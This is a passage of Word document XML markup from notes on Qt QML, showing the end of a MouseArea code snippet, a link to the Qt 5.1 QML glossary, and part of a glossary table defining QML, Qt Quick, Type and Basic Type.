        <w:rPr>
          <w:rStyle w:val="string"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"MouseArea was clicked at scene pos "</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scenePos</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="551"/>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://qt-project.org/doc/qt-5.1/qtdoc/qml-glossary.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://qt-project.org/doc/qt-5.1/qtdoc/qml-glossary.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00516C30">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="576" w:name="_Toc483000653"/>
      <w:bookmarkStart w:id="577" w:name="_Toc483003670"/>
      <w:bookmarkStart w:id="578" w:name="_Toc483604006"/>
      <w:bookmarkStart w:id="579" w:name="_Toc483605226"/>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Glossary Of QML Terms</w:t>
      </w:r>
      <w:bookmarkEnd w:id="576"/>
      <w:bookmarkEnd w:id="577"/>
      <w:bookmarkEnd w:id="578"/>
      <w:bookmarkEnd w:id="579"/>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00D72F99" w:rsidRDefault="00953F02" w:rsidP="00516C30">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="580" w:name="common-terms"/>
      <w:bookmarkStart w:id="581" w:name="_Toc483000654"/>
      <w:bookmarkStart w:id="582" w:name="_Toc483003671"/>
      <w:bookmarkStart w:id="583" w:name="_Toc483604007"/>
      <w:bookmarkStart w:id="584" w:name="_Toc483605227"/>
      <w:bookmarkEnd w:id="580"/>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Common</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Terms</w:t>
      </w:r>
      <w:bookmarkEnd w:id="581"/>
      <w:bookmarkEnd w:id="582"/>
      <w:bookmarkEnd w:id="583"/>
      <w:bookmarkEnd w:id="584"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1000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41"/>
        <w:gridCol w:w="8164"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112022" w:rsidRPr="00953F02" w:rsidTr="00D919D6">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1841"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2022" w:rsidRPr="00953F02" w:rsidRDefault="00112022" w:rsidP="00D919D6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="585" w:name="lazy-instantiation"/>
            <w:bookmarkEnd w:id="585"/>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8164"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2022" w:rsidRPr="00953F02" w:rsidRDefault="00112022" w:rsidP="00D919D6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Definition</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D32BAE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>QML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8164"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 xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32BAE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>language</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> in which QML applications are written. The language architecture and engine are implemented by the Qt QML module.</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953F02" w:rsidRDefault="00112022" w:rsidP="00D919D6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D32BAE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Qt Quick</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8164"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 xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32BAE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>standard library</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> of types and functionality for the QML language, which is provided by the Qt Quick module, and may be accessed with "import</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId416" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QtQuick</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.3".</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D32BAE">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8164"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In QML, a</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>type</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>may refer to either a</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId417" w:history="1">
              <w:r w:rsidRPr="00D32BAE">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Basic Type</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>or a</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId418" w:anchor="qml-object-types" w:history="1">
              <w:r w:rsidRPr="00D32BAE">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QML Object Type</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</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 xml:space="preserve">The QML language provides a number of </w:t>
            </w:r>
            <w:r w:rsidRPr="00D32BAE">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>built in</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId419" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>basic types</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>), and the Qt Quick module provides various</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId420" w:history="1">
              <w:r w:rsidRPr="00D32BAE">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Qt Quick types</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for building QML applications. Types can also be provided by third-party developers through (</w:t>
            </w:r>
            <w:hyperlink r:id="rId421" w:history="1">
              <w:r w:rsidRPr="00D32BAE">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>modules</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) or by the application developer in the application itself through</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId422" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QML Documents</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</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See</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId423" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>The QML Type System</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more details.</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953F02" w:rsidRDefault="00112022" w:rsidP="00D919D6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00806176">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Basic Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8164"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A</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId424" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>basic type</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is a </w:t>
            </w:r>
            <w:r w:rsidRPr="00806176">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>simple type</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> such as</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>string</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>bool</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. Unlike</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId425" w:anchor="qml-object-types" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>object types</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, an </w:t>
            </w:r>
            <w:r w:rsidRPr="00806176">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>object cannot be instantiated</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
